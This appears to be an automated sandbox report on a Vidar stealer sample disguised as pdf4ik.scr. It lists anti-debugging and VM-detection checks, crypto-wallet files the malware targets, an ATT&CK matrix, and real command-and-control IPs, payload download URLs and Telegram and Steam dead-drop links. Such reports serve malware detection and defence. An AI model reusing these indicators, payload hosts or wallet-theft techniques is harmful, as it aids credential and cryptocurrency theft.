                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26339
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26421
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26402
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrAPI call chain: ExitProcess graph end nodegraph_12-26358
                  Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                  Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: )GetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
                  Source: pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.00000000015F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                  Source: pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }DGetProcessWindowStationGetUserObjectInformationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLCONOUT$DISPLAYVMwareVMware237GIWzr{~
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_29DB387C
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA8390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_29DA8390
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA2920 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,std::_Xinvalid_argument,_memmove,wsprintfA,_memmove,_memmove,12_2_29DA2920
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_29DB387C
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DADF46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_29DADF46
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DB77BA SetUnhandledExceptionFilter,12_2_29DB77BA
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeQueries volume information: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pdf4ik.scr_d3ed75eaedbf1e5597eeca0ea8836d4192ee030_201b8dc8_79653cc3-7dca-4c64-8ba1-b09584582b02\Report.wer VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_29DB99E8
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,12_2_29DB9981
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,12_2_29DB98C1
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,12_2_29DB1B1C
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: GetLocaleInfoA,wsprintfA,_memset,LocalFree,12_2_29DA3A68
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,12_2_29DA3A00
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,12_2_29DB9A24
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,12_2_29DB8DD9
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: GetLocaleInfoA,12_2_29DB2DBB
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,12_2_29DB7E20
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_29DB817D
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,12_2_29DB90C7
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,12_2_29DB95EE
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,12_2_29DBD57F
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_29DB94F9
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,12_2_29DB96F0
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,12_2_29DB9695
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,12_2_29DBD659
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D81190 cpuid 12_2_29D81190
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,12_2_29DA3900
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,12_2_29DA3900
                  Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scrCode function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA,12_2_29D90880

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectronCash
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx_Desktop_Old
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                  Source: pdf4ik.scrString found in binary or memory: \Exodus\backups
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                  Source: pdf4ik.scrString found in binary or memory: \Exodus\backups
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum"
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default_wallet
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \MultiDoge\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                  Source: Yara matchFile source: 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Process Injection                  		11
                  Masquerading                  		OS Credential Dumping2
                  System Time Discovery                  		Remote Services1
                  Screen Capture                  		Exfiltration Over Other Network Medium21
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory131
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		Exfiltration Over Bluetooth3
                  Ingress Tool Transfer                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
                  Process Injection                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares1
                  Data from Local System                  		Automated Exfiltration3
                  Non-Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer114
                  Application Layer Protocol                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  Account Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  System Owner/User Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Remote System Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                  File and Directory Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow35
                  System Information Discovery                  		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  pdf_novichki.rar0%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr100%AviraWORM/Lodbak.Gen2

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e69630%Avira URL Cloudsafe
                  http://116.203.13.130/edit.zipvqD0%Avira URL Cloudsafe
                  http://116.203.13.130/edit.zip:D0%Avira URL Cloudsafe
                  http://116.203.13.1300%Avira URL Cloudsafe
                  http://116.203.13.1301%VirustotalBrowse
                  http://116.203.13.130/1%VirustotalBrowse
                  http://116.203.13.130/0%Avira URL Cloudsafe
                  http://116.203.13.130/oI0%Avira URL Cloudsafe
                  http://116.203.13.130/edit.zipx0%Avira URL Cloudsafe
                  http://116.203.13.130/edit.zip0%Avira URL Cloudsafe
                  http://116.203.13.130/edit.zip90%Avira URL Cloudsafe
                  http://135.181.87.234:800%Avira URL Cloudsafe
                  http://116.203.13.130z0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  t.me
                  		149.154.167.99
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://116.203.13.130/false
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://t.me/zaskullzfalse
                      		high
                      http://116.203.13.130/edit.zipfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://steamcommunity.com/profiles/76561199486572327false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://t.me/:pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://t.me/Xpdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://steamcommunity.com/profiles/76561199486572327http://135.181.87.234:80update.zip;open_openpdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://116.203.13.130/edit.zip:Dpdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://116.203.13.130/edit.zipvqDpdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://web.telegram.orgpdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://116.203.13.130/edit.zipcac5b60b5e28992247664-7ff3f708-074b-4ff4-b2c5-87e7-806e6f6e6963pdf4ik.scr, 0000000C.00000002.2415135723.0000000001453000.00000004.00000010.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://116.203.13.130pdf4ik.scr, 0000000C.00000003.2359804569.0000000001607000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://116.203.13.130/oIpdf4ik.scr, 0000000C.00000002.2416733096.000000000163B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://116.203.13.130/edit.zipxpdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://116.203.13.130/edit.zip9pdf4ik.scr, 0000000C.00000002.2416733096.00000000015D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://135.181.87.234:80pdf4ik.scr, pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.autoitscript.com/autoit3OpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://support.mozilla.orgOpenWith.exe, 00000006.00000003.1458609087.000002C74D216000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1469379781.000002C74D244000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://t.me/zaskullzfunkstaredit.zipMozilla/5.0pdf4ik.scr, 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, pdf4ik.scr, 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://116.203.13.130zpdf4ik.scr, 0000000C.00000002.2424739839.000000002BAB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      116.203.13.130
                                      		unknownGermany
                                      		24940HETZNER-ASDEfalse
                                      20.224.151.203
                                      		unknownUnited States
